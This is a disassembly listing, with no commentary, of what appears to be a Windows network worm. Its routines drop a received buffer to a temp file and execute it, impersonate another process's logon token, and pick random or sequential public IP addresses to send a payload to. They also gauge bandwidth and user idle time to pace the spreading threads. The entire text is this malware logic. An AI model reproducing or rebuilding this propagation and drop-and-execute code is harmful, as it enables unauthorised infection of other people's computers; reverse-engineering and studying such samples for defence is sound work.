push esi ; Str
call strrchr
add esp, 10h
test eax, eax
jz short loc_9AC2A2
mov byte ptr [eax], 0
pop esi
retn
; ---------------------------------------------------------------------------
loc_9AC2A2: ; CODE XREF: sub_9AC27E+1D�j
push esi ; lpBuffer
push 104h ; nBufferLength
call GetCurrentDirectoryA
push esi ; Str
call strlen
cmp byte ptr [eax+esi-1], 5Ch
pop ecx
jnz short loc_9AC2C8
push esi ; Str
call strlen
pop ecx
mov byte ptr [eax+esi-1], 0
loc_9AC2C8: ; CODE XREF: sub_9AC27E+3C�j
pop esi
retn
sub_9AC27E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC2CA(LPSTR lpCommandLine, int)
sub_9AC2CA proc near ; CODE XREF: sub_9A752A+137�p
; sub_9AB1F2+C4�p ...
StartupInfo = _STARTUPINFOA ptr -54h
ProcessInformation= _PROCESS_INFORMATION ptr -10h
lpCommandLine = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
xor edx, edx
xor eax, eax
mov [ebp+ProcessInformation.hProcess], edx
push 10h
lea edi, [ebp+ProcessInformation.hThread]
stosd
stosd
stosd
pop ecx
xor eax, eax
mov [ebp+StartupInfo.cb], 44h
lea edi, [ebp+StartupInfo.lpReserved]
rep stosd
mov eax, [ebp+arg_4]
xor edi, edi
inc edi
xor esi, esi
neg eax
sbb eax, eax
and eax, 5
mov [ebp+StartupInfo.wShowWindow], ax
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push edx ; lpCurrentDirectory
push edx ; lpEnvironment
push edx ; dwCreationFlags
push edx ; bInheritHandles
push edx ; lpThreadAttributes
push edx ; lpProcessAttributes
push [ebp+lpCommandLine] ; lpCommandLine
mov [ebp+StartupInfo.dwFlags], edi
push edx ; lpApplicationName
call CreateProcessA
test eax, eax
jz short loc_9AC334
push [ebp+ProcessInformation.hProcess] ; hObject
mov esi, CloseHandle
call esi ; CloseHandle
push [ebp+ProcessInformation.hThread] ; hObject
call esi ; CloseHandle
mov esi, edi
loc_9AC334: ; CODE XREF: sub_9AC2CA+56�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_9AC2CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC33A proc near ; CODE XREF: sub_9A8949+6�p
; sub_9AABA4+20�p
hObject = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push offset dword_9A14A0 ; Str2
xor ebx, ebx
call sub_9ABC24
cmp eax, ebx
pop ecx
jz short loc_9AC391
push edi
push eax ; dwProcessId
push ebx ; bInheritHandle
push 410h ; dwDesiredAccess
call OpenProcess
mov edi, eax
cmp edi, ebx
jz short loc_9AC390
push esi
lea eax, [ebp+hObject]
push eax ; TokenHandle
push 0Eh ; DesiredAccess
push edi ; ProcessHandle
call OpenProcessToken
test eax, eax
mov esi, CloseHandle
jz short loc_9AC38C
push [ebp+hObject] ; hToken
call ImpersonateLoggedOnUser
push [ebp+hObject] ; hObject
mov ebx, eax
call esi ; CloseHandle
loc_9AC38C: ; CODE XREF: sub_9AC33A+40�j
push edi ; hObject
call esi ; CloseHandle
pop esi
loc_9AC390: ; CODE XREF: sub_9AC33A+28�j
pop edi
loc_9AC391: ; CODE XREF: sub_9AC33A+14�j
mov eax, ebx
pop ebx
leave
retn
sub_9AC33A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC396(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite)
sub_9AC396 proc near ; CODE XREF: sub_9AD914+38�p
FileName = byte ptr -210h
PathName = byte ptr -10Ch
var_9 = byte ptr -9
NumberOfBytesWritten= dword ptr -8
var_4 = dword ptr -4
lpBuffer = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
push ebx
push esi
push edi
mov ebx, 104h
push ebx ; uSize
lea eax, [ebp+PathName]
push eax ; lpBuffer
call GetSystemDirectoryA
mov esi, GetTempFileNameA
lea eax, [ebp+FileName]
push eax ; lpTempFileName
push 0 ; uUnique
mov edi, offset PrefixString ; "0"
push edi ; lpPrefixString
lea eax, [ebp+PathName]
push eax ; lpPathName
mov [ebp+var_9], 0
call esi ; GetTempFileNameA
test eax, eax
jnz short loc_9AC407
lea eax, [ebp+PathName]
push eax ; lpBuffer
push ebx ; nBufferLength
call GetTempPathA
lea eax, [ebp+FileName]
push eax ; lpTempFileName
xor ebx, ebx
push ebx ; uUnique
push edi ; lpPrefixString
lea eax, [ebp+PathName]
push eax ; lpPathName
mov [ebp+var_9], 0
call esi ; GetTempFileNameA
jmp short loc_9AC409
; ---------------------------------------------------------------------------
loc_9AC407: ; CODE XREF: sub_9AC396+47�j
xor ebx, ebx
loc_9AC409: ; CODE XREF: sub_9AC396+6F�j
push ebx ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 2 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9AC46E
mov esi, [ebp+nNumberOfBytesToWrite]
push ebx ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push esi ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
mov [ebp+NumberOfBytesWritten], ebx
push edi ; hFile
call WriteFile
push edi ; hObject
call CloseHandle
cmp [ebp+NumberOfBytesWritten], esi
lea eax, [ebp+FileName]
jnz short loc_9AC467
push ebx ; int
push eax ; lpCommandLine
call sub_9AC2CA
test eax, eax
pop ecx
pop ecx
jz short loc_9AC46E
mov [ebp+var_4], 1
jmp short loc_9AC46E
; ---------------------------------------------------------------------------
loc_9AC467: ; CODE XREF: sub_9AC396+B9�j
push eax ; lpFileName
call DeleteFileA
loc_9AC46E: ; CODE XREF: sub_9AC396+91�j
; sub_9AC396+C6�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_9AC396 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC476 proc near ; CODE XREF: sub_9AC50E:loc_9AC54A�p
; sub_9AC50E:loc_9AC565�p
szUrl = byte ptr -2Ch
var_D = byte ptr -0Dh
dwFlags = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2Ch
push edi
xor edi, edi
call rand
push 5
pop ecx
xor edx, edx
div ecx
lea eax, [ebp+szUrl]
push ds:off_9B9AB4[edx*4]
push offset aHttpWww_S ; "http://www.%s"
push 20h ; Count
push eax ; Dest
call _snprintf
add esp, 10h
push edi ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
mov [ebp+var_D], 0
call InternetGetConnectedState
test eax, eax
jz short loc_9AC509
push ebx
push esi
mov esi, GetTickCount
mov [ebp+var_4], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
push 1 ; int
lea eax, [ebp+var_4]
push eax ; int
lea eax, [ebp+szUrl]
push eax ; lpszUrl
call sub_9ABAC6
add esp, 0Ch
mov ebx, eax
call esi ; GetTickCount
mov esi, eax
sub esi, [ebp+var_8]
test ebx, ebx
jz short loc_9AC507
push ebx ; hMem
call GlobalFree
test esi, esi
jz short loc_9AC507
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9AC507
xor edx, edx
div esi
mov edi, eax
imul edi, 3E8h
loc_9AC507: ; CODE XREF: sub_9AC476+71�j
; sub_9AC476+7C�j ...
pop esi
pop ebx
loc_9AC509: ; CODE XREF: sub_9AC476+42�j
mov eax, edi
pop edi
leave
retn
sub_9AC476 endp
; =============== S U B R O U T I N E =======================================
sub_9AC50E proc near ; CODE XREF: sub_9AC6FE+A�p
; sub_9AC6FE+28�p
var_C = dword ptr -0Ch
dwFlags = dword ptr -8
var_4 = dword ptr -4
sub esp, 0Ch
push ebx
push ebp
xor ebx, ebx
push ebx ; dwReserved
lea eax, [esp+18h+dwFlags]
push eax ; lpdwFlags
xor ebp, ebp
call InternetGetConnectedState
test eax, eax
jz loc_9AC5B3
mov al, byte ptr [esp+14h+dwFlags]
and al, 1
neg al
push esi
mov esi, Sleep
push edi
mov edi, 0BB8h
sbb eax, eax
and eax, 0FFFFFFA4h
add eax, 64h
mov ebp, eax
loc_9AC54A: ; CODE XREF: sub_9AC50E+50�j
call sub_9AC476
test eax, eax
mov [esp+1Ch+var_4], eax
jnz short loc_9AC560
push edi ; dwMilliseconds
call esi ; Sleep
inc ebx
cmp ebx, 5
jl short loc_9AC54A
loc_9AC560: ; CODE XREF: sub_9AC50E+47�j
and [esp+1Ch+var_C], 0
loc_9AC565: ; CODE XREF: sub_9AC50E+6E�j
call sub_9AC476
mov ebx, eax
test ebx, ebx
jnz short loc_9AC57E
push edi ; dwMilliseconds
call esi ; Sleep
inc [esp+1Ch+var_C]
cmp [esp+1Ch+var_C], 5
jl short loc_9AC565
loc_9AC57E: ; CODE XREF: sub_9AC50E+60�j
mov eax, [esp+1Ch+var_4]
test eax, eax
pop edi
pop esi
jz short loc_9AC5B3
test ebx, ebx
jz short loc_9AC5B3
add eax, ebx
push 6
shr eax, 1
xor edx, edx
pop ecx
div ecx
push 2Ch
xor edx, edx
pop ecx
div ecx
mov ebp, eax
mov eax, 190h
cmp ebp, eax
jbe short loc_9AC5AB
mov ebp, eax
loc_9AC5AB: ; CODE XREF: sub_9AC50E+99�j
cmp ebp, 8
jnb short loc_9AC5B3
push 8
pop ebp
loc_9AC5B3: ; CODE XREF: sub_9AC50E+17�j
; sub_9AC50E+78�j ...
mov eax, ebp
pop ebp
pop ebx
add esp, 0Ch
retn
sub_9AC50E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AC5BB(LPVOID)
sub_9AC5BB proc near ; DATA XREF: sub_9AC6FE+58�o
var_2C = dword ptr -2Ch
dwFlags = dword ptr -28h
Size = dword ptr -24h
Src = dword ptr -20h
netlong = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 1Ch
push offset stru_9A44C8
call __SEH_prolog
mov ebx, [ebp+arg_0]
push offset Addend ; lpAddend
call InterlockedIncrement
cmp ds:dword_9BA270, eax
jb loc_9AC6E9
and [ebp+ms_exc.disabled], 0
call sub_9AB510
push dword ptr [ebx+10h]
push dword ptr [ebx+4]
lea eax, [ebp+Size]
push eax
lea eax, [ebp+Src]
push eax
call sub_9A9654
add esp, 10h
test eax, eax
jz loc_9AC6E5
mov edi, 102h
mov esi, WaitForSingleObject
loc_9AC613: ; CODE XREF: sub_9AC5BB+100�j
; sub_9AC5BB+113�j
push 0 ; dwMilliseconds
push dword ptr [ebx] ; hHandle
call esi ; WaitForSingleObject
cmp eax, edi
jnz loc_9AC6D3
loc_9AC621: ; CODE XREF: sub_9AC5BB+EC�j
push 0 ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jz short loc_9AC6AD
loc_9AC631: ; CODE XREF: sub_9AC5BB+8E�j
; sub_9AC5BB+94�j ...
call rand
mov word ptr [ebp+netlong], ax
call rand
mov word ptr [ebp+netlong+2], ax
cmp byte ptr [ebp+netlong], 0Bh
jb short loc_9AC631
cmp byte ptr [ebp+netlong], 0F0h
ja short loc_9AC631
cmp byte ptr [ebp+netlong+1], 0FEh
ja short loc_9AC631
cmp al, 0FEh
ja short loc_9AC631
cmp byte ptr [ebp+netlong+3], 1
jb short loc_9AC631
cmp byte ptr [ebp+netlong+3], 0FEh
ja short loc_9AC631
push [ebp+netlong]
call sub_9AB3B6
pop ecx
test eax, eax
jz short loc_9AC631
push [ebp+netlong]
call sub_9AB389
pop ecx
test eax, eax
jz short loc_9AC631
mov eax, [ebp+netlong]
mov [ebp+var_2C], eax
cmp eax, [ebx+4]
jz short loc_9AC69B
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push eax ; netlong
call sub_9A9BBC
add esp, 0Ch
loc_9AC69B: ; CODE XREF: sub_9AC5BB+CF�j
push ds:dwMilliseconds ; dwMilliseconds
push dword ptr [ebx] ; hHandle
call esi ; WaitForSingleObject
cmp eax, edi
jz loc_9AC621
loc_9AC6AD: ; CODE XREF: sub_9AC5BB+74�j
; sub_9AC5BB+111�j
push 0 ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jnz loc_9AC613
push 3E8h ; dwMilliseconds
push dword ptr [ebx] ; hHandle
call esi ; WaitForSingleObject
cmp eax, edi
jz short loc_9AC6AD
jmp loc_9AC613
; ---------------------------------------------------------------------------
loc_9AC6D3: ; CODE XREF: sub_9AC5BB+60�j
push [ebp+Src] ; hMem
call GlobalFree
jmp short loc_9AC6E5
; ---------------------------------------------------------------------------
loc_9AC6DE: ; DATA XREF: .text:stru_9A44C8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AC6E2: ; DATA XREF: .text:stru_9A44C8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AC6E5: ; CODE XREF: sub_9AC5BB+47�j
; sub_9AC5BB+121�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_9AC6E9: ; CODE XREF: sub_9AC5BB+20�j
push offset Addend ; lpAddend
call InterlockedDecrement
xor eax, eax
call __SEH_epilog
retn 4
sub_9AC5BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AC6FE(LPVOID)
sub_9AC6FE proc near ; DATA XREF: sub_9ACABE+369�o
ThreadId = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
call sub_9AB510
call sub_9AC50E
mov edi, [ebp+ThreadId]
jmp short loc_9AC72B
; ---------------------------------------------------------------------------
loc_9AC712: ; CODE XREF: sub_9AC6FE+31�j
push 3E8h ; dwMilliseconds
push dword ptr [edi] ; hHandle
call WaitForSingleObject
cmp eax, 102h
jnz short loc_9AC781
call sub_9AC50E
loc_9AC72B: ; CODE XREF: sub_9AC6FE+12�j
mov esi, eax
test esi, esi
jz short loc_9AC712
push ebx
push 3
pop ecx
xor edx, edx
div ecx
push eax ; Value
push offset Target ; Target
call InterlockedExchange
test esi, esi
mov ebx, CloseHandle
jbe short loc_9AC76B
loc_9AC74F: ; CODE XREF: sub_9AC6FE+6B�j
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
push edi ; lpParameter
push offset sub_9AC5BB ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call CreateThread
push eax ; hObject
call ebx ; CloseHandle
dec esi
jnz short loc_9AC74F
loc_9AC76B: ; CODE XREF: sub_9AC6FE+4F�j
push 0FFFFFFFFh ; dwMilliseconds
push dword ptr [edi] ; hHandle
call WaitForSingleObject
push dword ptr [edi] ; hObject
call ebx ; CloseHandle
push edi ; hMem
call GlobalFree
pop ebx
loc_9AC781: ; CODE XREF: sub_9AC6FE+26�j
pop edi
xor eax, eax
pop esi
pop ebp
retn 4
sub_9AC6FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AC789(LPVOID)
sub_9AC789 proc near ; DATA XREF: sub_9AC911+10C�o
; sub_9ACABE+20F�o
var_30 = dword ptr -30h
dwFlags = dword ptr -2Ch
Size = dword ptr -28h
Src = dword ptr -24h
netlong = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 20h
push offset stru_9A44D8
call __SEH_prolog
mov esi, [ebp+arg_0]
mov [ebp+var_30], esi
push offset Addend ; lpAddend
call InterlockedIncrement
cmp ds:dword_9BA270, eax
jb loc_9AC8ED
and [ebp+ms_exc.disabled], 0
call sub_9AB510
mov ebx, 102h
mov edi, WaitForSingleObject
loc_9AC7C6: ; CODE XREF: sub_9AC789+14A�j
mov eax, [esi+8]
mov [ebp+netlong], eax
push dword ptr [esi+10h]
push dword ptr [esi+4]
lea eax, [ebp+Size]
push eax
lea eax, [ebp+Src]
push eax
call sub_9A9654
add esp, 10h
test eax, eax
jz loc_9AC893
and [ebp+var_1C], 0
loc_9AC7EE: ; CODE XREF: sub_9AC789+E9�j
; sub_9AC789+FC�j
push 0 ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jnz loc_9AC88A
mov eax, [ebp+var_1C]
cmp eax, [esi+0Ch]
jnb loc_9AC88A
loc_9AC808: ; CODE XREF: sub_9AC789+D9�j
push 0 ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jz short loc_9AC864
mov eax, [ebp+var_1C]
cmp eax, [esi+0Ch]
jnb short loc_9AC864
push [ebp+netlong] ; netlong
call ntohl_0
inc eax
push eax ; netlong
call ntohl
mov [ebp+netlong], eax
cmp eax, [esi+4]
jz short loc_9AC85F
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push eax ; netlong
call sub_9A9BBC
add esp, 0Ch
cmp dword ptr [esi+14h], 0
mov eax, ds:dwMilliseconds
jnz short loc_9AC856
mov eax, ds:dword_9B9AB0
loc_9AC856: ; CODE XREF: sub_9AC789+C6�j
push eax ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jnz short loc_9AC864
loc_9AC85F: ; CODE XREF: sub_9AC789+AC�j
inc [ebp+var_1C]
jmp short loc_9AC808
; ---------------------------------------------------------------------------
loc_9AC864: ; CODE XREF: sub_9AC789+8D�j
; sub_9AC789+95�j ...
push 0 ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jnz loc_9AC7EE
push 3E8h ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jz short loc_9AC864
jmp loc_9AC7EE
; ---------------------------------------------------------------------------
loc_9AC88A: ; CODE XREF: sub_9AC789+6D�j
; sub_9AC789+79�j
push [ebp+Src] ; hMem
call GlobalFree
loc_9AC893: ; CODE XREF: sub_9AC789+5B�j
cmp dword ptr [esi+14h], 0
jz short loc_9AC8A4
push offset dword_9BA280 ; lpAddend
call InterlockedDecrement
loc_9AC8A4: ; CODE XREF: sub_9AC789+10E�j
push 36EE80h ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jnz short loc_9AC8D9
cmp dword ptr [esi+14h], 0
jnz short loc_9AC8D9
call rand
cdq
push 1Eh
pop ecx
idiv ecx
add edx, 3Ch
imul edx, 0EA60h
push edx ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jz loc_9AC7C6
loc_9AC8D9: ; CODE XREF: sub_9AC789+126�j
; sub_9AC789+12C�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9AC8ED
; ---------------------------------------------------------------------------
loc_9AC8DF: ; DATA XREF: .text:stru_9A44D8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AC8E3: ; DATA XREF: .text:stru_9A44D8�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_30]
loc_9AC8ED: ; CODE XREF: sub_9AC789+23�j
; sub_9AC789+154�j
push offset Addend ; lpAddend
call InterlockedDecrement
push dword ptr [esi] ; hObject
call CloseHandle
push esi ; hMem
call GlobalFree
xor eax, eax
call __SEH_epilog
retn 4
sub_9AC789 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC911 proc near ; CODE XREF: sub_9AE6A2+325�p
Name = byte ptr -2Ch
var_D = byte ptr -0Dh
ThreadId = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
push [ebp+arg_4]
call sub_9AB389
test eax, eax
pop ecx
jnz short loc_9AC933
mov eax, ds:dword_9BA278
mov [ebp+arg_4], eax
mov eax, ds:dword_9BA27C
jmp short loc_9AC938
; ---------------------------------------------------------------------------
loc_9AC933: ; CODE XREF: sub_9AC911+11�j
mov eax, ds:dword_9BA2A4
loc_9AC938: ; CODE XREF: sub_9AC911+20�j
push esi
mov esi, [ebp+arg_0]
push esi
mov [ebp+var_8], eax
call sub_9AB3B6
test eax, eax
pop ecx
jz loc_9ACA4D
push [ebp+arg_4]
call sub_9AB3B6
test eax, eax
pop ecx
jz loc_9ACA4D
push esi
call sub_9AB389
test eax, eax
pop ecx
jz loc_9ACA4D
push [ebp+arg_4]
call sub_9AB389
test eax, eax
pop ecx
jz loc_9ACA4D
mov al, byte ptr [ebp+arg_0+2]
push ebx
xor ebx, ebx
cmp al, 0Ah
mov [ebp+var_4], esi
jb short loc_9AC998
sub al, 0Ah
mov esi, 0AF5h
mov byte ptr [ebp+var_4+2], al
jmp short loc_9AC9A5
; ---------------------------------------------------------------------------
loc_9AC998: ; CODE XREF: sub_9AC911+79�j
movzx esi, al
inc esi
imul esi, 0FFh
mov byte ptr [ebp+var_4+2], bl
loc_9AC9A5: ; CODE XREF: sub_9AC911+85�j
push edi
push esi
mov byte ptr [ebp+var_4+3], bl
push [ebp+var_4]
lea eax, [ebp+Name]
push [ebp+arg_4]
push offset aN08x08x08x ; "n%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call _snprintf
add esp, 18h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInitialState
push 1 ; bManualReset
push ebx ; lpEventAttributes
mov [ebp+var_D], bl
call CreateEventA
mov edi, eax
cmp edi, ebx
jz short loc_9ACA4B
call GetLastError
cmp eax, 0B7h
jz short loc_9ACA44
push offset dword_9BA280 ; lpAddend
call InterlockedIncrement
cmp ds:Target, eax
jl short loc_9ACA39
push 18h ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov ecx, [ebp+var_4]
mov [eax+8], ecx
mov ecx, [ebp+var_8]
mov [eax+10h], ecx
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_9AC789 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
mov [eax], edi
mov [eax+0Ch], esi
mov dword ptr [eax+14h], 1
call CreateThread
push eax
jmp short loc_9ACA45
; ---------------------------------------------------------------------------
loc_9ACA39: ; CODE XREF: sub_9AC911+E8�j
push offset dword_9BA280 ; lpAddend
call InterlockedDecrement
loc_9ACA44: ; CODE XREF: sub_9AC911+D5�j
push edi ; hObject
loc_9ACA45: ; CODE XREF: sub_9AC911+126�j
call CloseHandle
loc_9ACA4B: ; CODE XREF: sub_9AC911+C8�j
pop edi
pop ebx
loc_9ACA4D: ; CODE XREF: sub_9AC911+37�j
; sub_9AC911+48�j ...
pop esi
leave
retn
sub_9AC911 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall sub_9ACA50(LPVOID)
sub_9ACA50 proc near ; DATA XREF: sub_9ACFCF+15�o
plii = tagLASTINPUTINFO ptr -8
push ecx
push ecx
push ebx
push ebp
push esi
mov esi, InterlockedExchange
push edi
mov ebp, offset dwMilliseconds
mov ebx, offset dword_9B9AB0
loc_9ACA66: ; CODE XREF: sub_9ACA50+6C�j
xor eax, eax
mov [esp+18h+plii.cbSize], 8
lea edi, [esp+18h+plii.dwTime]
stosd
lea eax, [esp+18h+plii]
push eax ; plii
call GetLastInputInfo
test eax, eax
jz short loc_9ACAB1
call GetTickCount
sub eax, [esp+18h+plii.dwTime]
cmp eax, 493E0h
jnb short loc_9ACAA4
push 7D0h ; Value
push ebp ; Target
call esi ; InterlockedExchange
push 0C8h
jmp short loc_9ACAAE
; ---------------------------------------------------------------------------
loc_9ACAA4: ; CODE XREF: sub_9ACA50+43�j
push 3E8h ; Value
push ebp ; Target
call esi ; InterlockedExchange
push 64h ; Value
loc_9ACAAE: ; CODE XREF: sub_9ACA50+52�j
push ebx ; Target
call esi ; InterlockedExchange
loc_9ACAB1: ; CODE XREF: sub_9ACA50+32�j
push 2710h ; dwMilliseconds
call Sleep
jmp short loc_9ACA66
sub_9ACA50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_9ACABE(LPVOID)
sub_9ACABE proc near ; DATA XREF: sub_9ACFCF+2D�o
var_1850 = byte ptr -1850h
var_184C = byte ptr -184Ch
in = in_addr ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_C48 = dword ptr -0C48h
ThreadId = dword ptr -50h
var_4C = byte ptr -4Ch
Name = byte ptr -48h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
Dst = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 1850h
call __alloca_probe
push ebx
push esi
push edi
xor eax, eax
xor ebx, ebx
mov [ebp+Dst], ebx
lea edi, [ebp+var_1C]
stosd
stosd
mov eax, ds:dword_9B9E20
shr eax, 1
mov ds:dword_9BA270, eax
call sub_9AB510
loc_9ACAEB: ; CODE XREF: sub_9ACABE+50C�j
mov esi, InternetGetConnectedState
jmp short loc_9ACAFE
; ---------------------------------------------------------------------------
loc_9ACAF3: ; CODE XREF: sub_9ACABE+49�j
push 1388h ; dwMilliseconds
call Sleep
loc_9ACAFE: ; CODE XREF: sub_9ACABE+33�j
lea eax, [ebp+var_4]
push ebx
push eax
call esi ; InternetGetConnectedState
test eax, eax
jz short loc_9ACAF3
loc_9ACB09: ; CODE XREF: sub_9ACABE+6E�j
push 1388h ; dwMilliseconds
call Sleep
lea eax, [ebp+in]
push 100h ; int
push eax ; Dst
call sub_9AB41B
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_C], eax
jz short loc_9ACB09
xor eax, eax
cmp [ebp+var_C], ebx
mov [ebp+var_4], eax
jbe loc_9ACD02
loc_9ACB3C: ; CODE XREF: sub_9ACABE+23E�j
lea eax, [eax+eax*2]
shl eax, 2
push [ebp+eax+var_C48]
push [ebp+eax+var_C4C]
push dword ptr [ebp+eax+in.S_un]
lea eax, [ebp+Name]
push offset aL08x08x08x ; "l%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call _snprintf
add esp, 18h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInitialState
push 1 ; bManualReset
push ebx ; lpEventAttributes
mov [ebp+var_29], bl
call CreateEventA
mov esi, eax
cmp esi, ebx
jz loc_9ACCF2
call GetLastError
cmp eax, 0B7h
jz loc_9ACCEB
cmp ds:dword_9BA278, ebx
jnz loc_9ACC9F
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
push dword ptr [ebp+eax*4+in.S_un]
call sub_9AB389
test eax, eax
pop ecx
jnz loc_9ACC9F
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
push dword ptr [ebp+eax*4+in.S_un] ; in
lea eax, [ebp+var_10]
push eax ; int
lea eax, [ebp+var_28]
push eax ; int
call sub_9A9289
add esp, 0Ch
test eax, eax
jz loc_9ACC9F
mov eax, [ebp+var_4]
mov ecx, [ebp+var_28]
lea eax, [eax+eax*2]
cmp ecx, dword ptr [ebp+eax*4+in.S_un]
jnz loc_9ACC9F
push [ebp+var_10]
call sub_9AB3B6
test eax, eax
pop ecx
jz loc_9ACC9F
push [ebp+var_10]
call sub_9AB389
test eax, eax
pop ecx
jz loc_9ACC9F
xor ecx, ecx
lea eax, [ebp+in]
loc_9ACC23: ; CODE XREF: sub_9ACABE+173�j
mov edx, [eax]
cmp edx, [ebp+var_10]
jz short loc_9ACC9F
inc ecx
add eax, 0Ch
cmp ecx, [ebp+var_C]
jb short loc_9ACC23
push ebx ; in
lea eax, [ebp+var_8]
push eax ; int
xor eax, eax
mov ax, word ptr ds:dword_9BA2A4
mov [ebp+var_8], ebx
push eax ; __int16
call sub_9A932E
add esp, 0Ch
test eax, eax
jz short loc_9ACC9F
cmp word ptr [ebp+var_8], bx
jz short loc_9ACC9F
push [ebp+var_8]
push [ebp+var_10]
call sub_9AECA4
test eax, eax
pop ecx
pop ecx
jz short loc_9ACC9F
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
shl eax, 2
mov ecx, dword ptr [ebp+eax+in.S_un]
mov [ebp+Dst], ecx
mov ecx, [ebp+eax+var_C4C]
mov eax, [ebp+eax+var_C48]
mov [ebp+var_18], eax
movzx eax, word ptr [ebp+var_8]
mov ds:dword_9BA27C, eax
mov eax, [ebp+var_10]
mov [ebp+var_1C], ecx
mov ds:dword_9BA278, eax
loc_9ACC9F: ; CODE XREF: sub_9ACABE+DF�j
; sub_9ACABE+FA�j ...
push 18h ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov [eax], esi
mov ecx, [ebp+var_4]
lea esi, [ecx+ecx*2]
lea esi, [ebp+esi*4+in]
lea edi, [eax+4]
movsd
movsd
movsd
mov ecx, ds:dword_9BA2A4
mov [eax+10h], ecx
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_9AC789 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
